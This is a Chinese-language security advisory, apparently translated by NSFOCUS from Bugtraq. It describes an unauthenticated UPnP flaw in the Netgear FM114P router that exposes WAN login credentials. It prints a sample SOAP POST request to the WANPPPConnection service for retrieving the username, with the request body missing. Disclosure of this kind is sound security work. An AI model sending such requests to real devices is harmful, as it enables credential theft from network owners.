安全研究

安全漏洞
Netgear FM114P ProSafe无线路由器UPnP信息泄露漏洞

发布日期:2003-04-03
更新日期:2003-04-08

受影响系统:
Netgear FM114P
描述:
BUGTRAQ  ID: 7267

Netgear FM114P ProSafe是一款无线网络路由器。

Netgear FM114P ProSafe无线网络路由器在使用UPnP功能时存在漏洞,远程攻击者可以利用这个漏洞获得WAN接口用户名和密码信息。

如果设备中远程访问和UPnP功能开启的情况下,远程用户可以不用验证获得Netgear FM114P ProSafe连接的用户名和密码信息,这可以通过提交UPnP soap请求给WAN接口而获得。

<*来源:Bj?rn Stickler (stickler@rbg.informatik.tu-darmstadt.de
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104940655818917&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Bj?rn Stickler (stickler@rbg.informatik.tu-darmstadt.de)提供了如下测试方法:

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289


---- end of example request to get username   --------------

建议:
厂商补丁:

Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.netgear.com/

浏览次数:2946
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障